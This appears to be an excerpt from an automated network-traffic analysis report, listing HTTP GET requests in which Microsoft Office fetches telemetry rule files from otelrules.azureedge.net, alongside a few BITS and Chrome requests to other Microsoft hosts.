          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
